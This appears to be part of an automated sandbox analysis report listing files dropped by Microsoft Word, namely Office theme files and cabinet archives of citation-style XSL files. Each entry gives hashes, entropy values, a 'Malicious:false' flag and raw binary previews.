                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):278
                                                                                                                                                                                                                                                                Entropy (8bit):3.544065206514744
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXCARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyy6ymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:06B3DDEFF905F75FA5FA5C5B70DCB938
                                                                                                                                                                                                                                                                SHA1:E441B94F0621D593DC870A27B28AC6BE3842E7DB
                                                                                                                                                                                                                                                                SHA-256:72D49BDDE44DAE251AEADF963C336F72FA870C969766A2BB343951E756B3C28A
                                                                                                                                                                                                                                                                SHA-512:058792BAA633516037E7D833C8F59584BA5742E050FA918B1BEFC6F64A226AB3821B6347A729BEC2DF68BB2DFD2F8E27947F74CD4F6BDF842606B9DEDA0B75CC
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .D.a.m.a.s.k...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3078052
                                                                                                                                                                                                                                                                Entropy (8bit):7.954129852655753
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:bSEjlpY8skyFHuj2yY0ciM9U2NCVBB4YFzYFw7IaJE2VRK+Xn9DOOe9pp9N9Hu:bfp5sksA3cimUVxV05aJE2fKaDOXdN9O
                                                                                                                                                                                                                                                                MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                                                                                                                                                                                                                                SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                                                                                                                                                                                                                                SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                                                                                                                                                                                                                                SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):274
                                                                                                                                                                                                                                                                Entropy (8bit):3.5303110391598502
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXzRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnylymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:8D1E1991838307E4C2197ECB5BA9FA79
                                                                                                                                                                                                                                                                SHA1:4AD8BB98DC9C5060B58899B3E9DCBA6890BC9E93
                                                                                                                                                                                                                                                                SHA-256:4ABA3D10F65D050A19A3C2F57A024DBA342D1E05706A8A3F66B6B8E16A980DB9
                                                                                                                                                                                                                                                                SHA-512:DCDC9DB834303CC3EC8F1C94D950A104C504C588CE7631CE47E24268AABC18B1C23B6BEC3E2675E8A2A11C4D80EBF020324E0C7F985EA3A7BBC77C1101C23D01
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.e.s.h...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2924237
                                                                                                                                                                                                                                                                Entropy (8bit):7.970803022812704
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:49152:mc4NEo4XNd5wU5qTkdC4+K9u5b/i40RKRAO/cLf68wy9yxKrOUURBgmai2prH:mJef5yTSoKMF//DRGJwLx9DBaH
                                                                                                                                                                                                                                                                MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                                                                                                                                                                                                                                SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                                                                                                                                                                                                                                SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                                                                                                                                                                                                                                SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):286
                                                                                                                                                                                                                                                                Entropy (8bit):3.5434534344080606
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Q+sxnxUXIc5+RELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny4KcymD0wbnKNAH/lMz1
                                                                                                                                                                                                                                                                MD5:C9812793A4E94320C49C7CA054EE6AA4
                                                                                                                                                                                                                                                                SHA1:CC1F88C8F3868B3A9DE7E0E5F928DBD015234ABA
                                                                                                                                                                                                                                                                SHA-256:A535AE7DD5EDA6D31E1B5053E64D0D7600A7805C6C8F8AF1DB65451822848FFC
                                                                                                                                                                                                                                                                SHA-512:D28AADEDE0473C5889F3B770E8D34B20570282B154CD9301932BF90BF6205CBBB96B51027DEC6788961BAF2776439ADBF9B56542C82D89280C0BEB600DF4B633
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .M.a.i.n._.E.v.e.n.t...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3239239 bytes, 2 files, at 0x44 +A "content.inf" +A "Vapor_Trail.thmx", flags 0x4, ID 19811, number 1, extra bytes 20 in head, 111 datablocks, 0x1503 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3256855
                                                                                                                                                                                                                                                                Entropy (8bit):7.996842935632312
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:98304:wh7I1aeH9YvgK+A+a7GiiQzP4YZDpQ2+Sd6Y:w21ay93aypQzzhpBL/
                                                                                                                                                                                                                                                                MD5:8867BDF5FC754DA9DA6F5BA341334595
                                                                                                                                                                                                                                                                SHA1:5067CCE84C6C682B75C1EF3DEA067A8D58D80FA9
                                                                                                                                                                                                                                                                SHA-256:42323DD1D3E88C3207E16E0C95CA1048F2E4CD66183AD23B90171DA381D37B58
                                                                                                                                                                                                                                                                SHA-512:93421D7FE305D27E7E2FD8521A8B328063CD22FE4DE67CCCF5D3B8F0258EF28027195C53062D179CD2EBA3A7E6F6A34A7A29297D4AF57650AA6DD19D1EF8413D
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....Gm1.....D...............cM..........Gm1..D..............o... ..........MP. .content.inf...7. ......MP. .Vapor_Trail.thmx..n...N..[......L........7...+I..x...P7/...BH..Rm.\yqi.x..B....{.m.............=.....p.%.@......BpV.[......C.4..X./..Y.'SB..........0.Gr.FG.).....R\...2..Jt..1..._.4_B..................cn7H.-.....Q...1..G{G.~.. '.$......@.(....=@=..`....@.@.A. ....'.4`. .@....D...'....S.s..9.7" /....?.aY.c.........LG....k...?_.....P.....?.1.....FB..m..t...['......:...?...W..../~..z.Tr...X.@...._....3..N..p.....b...t.....^..t...~..t.8A...t_....D..3R.Z.=..{.A.8).3-5..v.isz....0A~%.s.D.4....k.K......8......)R.}f.E..n.g&:W...'E....4%T..>......b.y..[..zI....e...j.s....F.....|7826U.C.,..BY.U.F.f......"..#.m..,..._...#.\.....gPP.2.}Kas......g..3.d0.Z.Z.]..n......MY]6.....].m..D.6...?.n.20.,.#...S...JK..#.W.%.Z4.....i..CBf...../..z......n.N...U.....8t...ny...=.!..#..SF..e...1.P..@.Qx*.f.;..t..S.>..... F..)...@.Y..5j....x....vI.mM....Z.W..77...
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3400898 bytes, 2 files, at 0x4c "Insight design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 106 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3417042
                                                                                                                                                                                                                                                                Entropy (8bit):7.997652455069165
                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                SSDEEP:98304:1YYkj2mRz6vkkB15AW4QD0ms+FdniD60bDUpS:qYkj7d6vP7NZDLn+PM8
                                                                                                                                                                                                                                                                MD5:749C3615E54C8E6875518CFD84E5A1B2
                                                                                                                                                                                                                                                                SHA1:64D51EB1156E850ECA706B00961C8B101F5AC2FC
                                                                                                                                                                                                                                                                SHA-256:F2D2DF37366F8E49106980377D2448080879027C380D90D5A25DA3BDAD771F8C
                                                                                                                                                                                                                                                                SHA-512:A5F591BA5C31513BD52BBFC5C6CAA79C036C7B50A55C4FDF96C84D311CCDCF1341F1665F1DA436D3744094280F98660481DCA4AA30BCEB3A7FCCB2A62412DC99
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF......3.....L.............................3..?..............j.....3.....t.4.............Insight design set.dotx.................Content.inf...QJ.N..[.........R.....L....N).J|E.B.$.B).3,...n.....JW....k.U1..M...3#.5....$^.....;vR...Z.nj...#......^*......a.{..(..o.v...!L`...T.-&jZ`.\.*0.....G.."b.m..F.X......$>%..?.D..H.l.j....$.......MrQ......q-....hx...6.D.3...j....n..U#R..3....sm?..xJr..............$G8..t.g...?.g.}......$P._...7.#..w..9DR....*lu....?..'.Ai..v.vl..`......B..N_....W./.;...c=oYW.lL'bv.......+...9.P..B=...*Y.SX=EL.5o....?H.e|.Fn.M[...d.v.....i......9..U..H....uq.Nrn..@..e...3....8.....s8}z..$........B....26...d..?.l....=.aeM.[..|n....H.;..7A.`....=.F...V.Y.l..8.........%e.x0S.....~..2..%.....U..#.r_.0V.v.6w.l.......Y.........v..o+....*sn.$^'.Il...akUU....w....~.....&8.Vwj.....Q.uQ..&..G.($.2.s.?m.B.~j.*..+G.W..qi..g..5.)){O........o.ow.(;.{...y;n...J...&.F2.@.;......[{'w..........`....czW.........?W...}..w....x..........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):28911
                                                                                                                                                                                                                                                                Entropy (8bit):7.7784119983764715
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                                                                                                                                                                                                                                MD5:6D787B1E223DB6B91B69238062CCA872
                                                                                                                                                                                                                                                                SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                                                                                                                                                                                                                                SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                                                                                                                                                                                                                                SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....1......L............................1...?...................0......"}..............ieee2006officeonline.xsl.:...............Content.inf.........[...G."...3$pE...G B....m3o[...I2&.f.,\..........}.n..{..e.8!^.3.A@...x..... .D.52gU..]..."..N8....s..CS..J3..HV...m...y..o....F.z......V.j._....=~k.....'.dY........1........#...d13.g.&C...C.xw.`f.hf..........]M....m.m....ud...,+.H~..cL...e#;(RI...eA....I.b...E...2..(...$.j...L...$..A....'[...H9..&..G.Q....".M.yl....]..?j%+....O~.*....|.se...K\.B"W..F.5.......=s...l.Y...K..yN.TBH[...sTWR.N.d...WEa....T.d.K.^sauI......m..s=.,qso5.b.V.s.]..9..,k4.\..L.;D...........;r.C...7.w.j..:N8.V6..a.3..j:A.mA..To..$.5....:./..p.x.3.=..__...8.EB.K.*..].-."..5-XU..J.....=o..K.Wavg.o].z.9.gk.._.........MZ.<.5............OY.n.o...r.9v.c.......[n.[..D...d..}.j.....LB,]_.9..St.@..C....\...^....-&.njq..!P....G^.....w.7.p~.......M..g.J............t1......q.w.rx...qp.....E.........-...2..G.........z.]B........d....C.@...@.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):33610
                                                                                                                                                                                                                                                                Entropy (8bit):7.8340762758330476
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                                                                                                                                                                                                                                MD5:51804E255C573176039F4D5B55C12AB2
                                                                                                                                                                                                                                                                SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                                                                                                                                                                                                                                SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                                                                                                                                                                                                                                SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF....:D......L...........................:D...?..................XC.....................chicago.xsl. ...............Content.inf.!..B...[...H."m..3C.6...WP!i/Z..vn._...^omvw+...^..L.4o...g..y......^..x...BH.B.K....w.....F........p ./gg.h.0I',.$..a.`.*...^..vi..mw..........K....oQ............P...#...3.......U(.=...q.~?..H..?.'I4'.......X...}w.vw.....f.n..f{3.....-....%dK&q..D.H.Z..h-..H.[$ %.."..e....1...$.............'.....B..%..4...&`S!DQ...M.......N~............S..'....M..4E.^..dej..i..+.`...6F%sJ....Q..d.(*.s.Z...U-5Eh.s.CK...K..X$......j..T.?.`.|...=..R...-7...*...TU.....7a...&I.noOK|.W.R-+S.d..rR.....{h.Y...)..xJ..=.XM..o...P'.I4m..~I..C..m.....f.....;{Mzg+Wm.~...z...r-.....eK...lj:^.1g5...7.h(T"..t?5......u.....G.Z<..sL.\{...8=t...Z...'tps.:...|....6.....S..X...I...6l.M.....aq.;YS....{:.&.'.&.F.l...\.[L.%.so\.v.Lo...zO.^^...p..*9k...).CC..F0>L...VUE4.......2..c..p.rCi..#...b.C@o.l.. E_b..{d...hX.\_!a#.E.....yS.H...aZ...~D3.pj: ss?.]....~
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):31482
                                                                                                                                                                                                                                                                Entropy (8bit):7.808057272318224
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                                                                                                                                                                                                                                MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                                                                                                                                                                                                                                SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                                                                                                                                                                                                                                SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                                                                                                                                                                                                                                SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....;......L............................;...?...................;......................gosttitle.xsl.$...............Content.inf....v....[...=..Ic.32.E...`o.............m....4uk[.,.......{...}k{.R@(Hq..68nv...@.D.....$...j....8Q..........8.8........3...*.bi?Wt...:(..J.;&eii..io.w..z...`.'..i.MLR@.>....N..3`P.>$X@(r.#.D..(....P"_..I.$o.. L!y...I...H.........{.{....{.3....7..w..{w.2sn.dYn.lW...l...c$.UH....L6. .D$$...!F.!... .D............_..'.`.Q.v>..Z..f.n.l....0o.......bK...?s..eO....'.>t......S'..........~....h...v&7:q.x9|qs...%....:..D...ag.....e..'...".A.Y..?w"....p1t.9J.~.4.........~vj.n.8.;.O......../.}..io{p...e...\m.d`.gAm.......1"...N*...8..g"......~..[.e+.....\6i4.....%...Rq.U-p?..4P..4.f.?N.vI?.M\i.;.s..E.L.hu.*...\..5....N......]......\`...rS.\g.....2..!a).?.l.!i.^.t.u...x...g/.A..v.E...\.@.>kM...&.g.....%.......{.....2..E.g...'..[w...N.w..& 4M.a.cu.%:...\.D..Q..C.'fm..i....@._......QI.. ....h..|fB.il.(`..h.d;.l...`.s:
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):31008
                                                                                                                                                                                                                                                                Entropy (8bit):7.806058951525675
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                                                                                                                                                                                                                                MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                                                                                                                                                                                                                                SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                                                                                                                                                                                                                                SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                                                                                                                                                                                                                                SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....:......L............................:...?...................9......................mlaseventheditionofficeonline.xsl.L...............Content.inf.N.#.....[...>..9..3c.5...F.B.]Y.3..%d.8...v;....~Y.L.=..v..m.g...|K.B....$......s.......#CdE.p.p..@...j.Nl2'...L..N.G:-V:.d.....i..M........mK.w.....\W.<.`..b$.!..!3..rT.A..#.).;KZ...a.-..j&e`R.~7dIRS.I..f.ff....}.}....^[wo.uw..i.m7......v$.I..n....-.Z.M5...iH..Ea..., [..0.L...DH..." ..... .@...H.@..+...}.......*^..'.4*.tHa..f].gV..~.7V.....C..).(.U"..f.@l..j'..%\.u.UU.....9<13...5..=........./..Z..{..-.L].+Y.fL.<EJ.q..!.j....W..]E./.~Y>...GgQ..-....Q.C..5..T+...fO. .)..~.7..Y....+..U=.e..8w.m...._..S..v.d.* ......S3z.X)......u...t.......i.;.a...X.Ji....g.3.!.O.....T.f6..[U....O..Z.X.q.G....?.k]..?...8.u.;].8y.T.9D..!?R....:........3+.P.....7?m}..............1...y3.g.\c.ks^;?.f.U5...U.j....E.N.}.!.......).R1....~.....R.....3.J.f...l..E^:...&_..%..v...^..E...rC..O....M.#..<..H..bB.+.W..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):31471
                                                                                                                                                                                                                                                                Entropy (8bit):7.818389271364328
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                                                                                                                                                                                                                                MD5:91AADBEC4171CFA8292B618492F5EF34
                                                                                                                                                                                                                                                                SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                                                                                                                                                                                                                                SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                                                                                                                                                                                                                                SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:MSCF.....;......L............................;...?...................;......g...............sist02.xsl.................Content.inf....!....[...=.rF..3U.5...g.i?..w.oY..If'.......Y.;.B.....Wo.{T.TA.~......8......u.p....@Q..k.?.....G....j.|*.*J69H.2.ee..23s..;3..i..L.,...0se.%J........%.....!.....qB...SC...GAu5.P..u7....:.|.$Fo............{.......v.v.g..{o....e.....m.JeRG..,.%.1..Lh.@8.i.....l.#.HB`B....C......D@....?....P?..................|.9..q.......9.n.....F...s,....3..Q..N......y......_i..9|.<w...'q.Tq...U.E.B...q.?.4..O(_O.A.......*jC.~.21.7.....u.C...]uc.....-.g.{C~9q.q.1.1...4..=.0.Z.^....'../....-.6.K.....K...A#.GR..t.@.{.O.......Q5..=....X...^...F3.e.E.Z..b+R..?Z..0T1.....gQz.&....%y=zx.f.....6-*...u.Rm..x<...?...!g@.}..).J...:*...9.s&.v..}..'...\..Sd..F...........kQr.....h..3..1....B...B{M...%O.59.\.#....s/.pE.:}...k_.P.>.zj....5|.9+....$M..L........(...@#.....N.....N.*..........E..7..R$.:9!r>7.....v...>..S.w....9..]..n.w.;&.W..<r\S....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):31835
                                                                                                                                                                                                                                                                Entropy (8bit):7.81952379746457
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                                                                                                                                                                                                                                MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                                                                                                                                                                                                                                SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                                                                                                                                                                                                                                SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                                                                                                                                                                                                                                SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                                                                                                                                                                                                                                Malicious:false
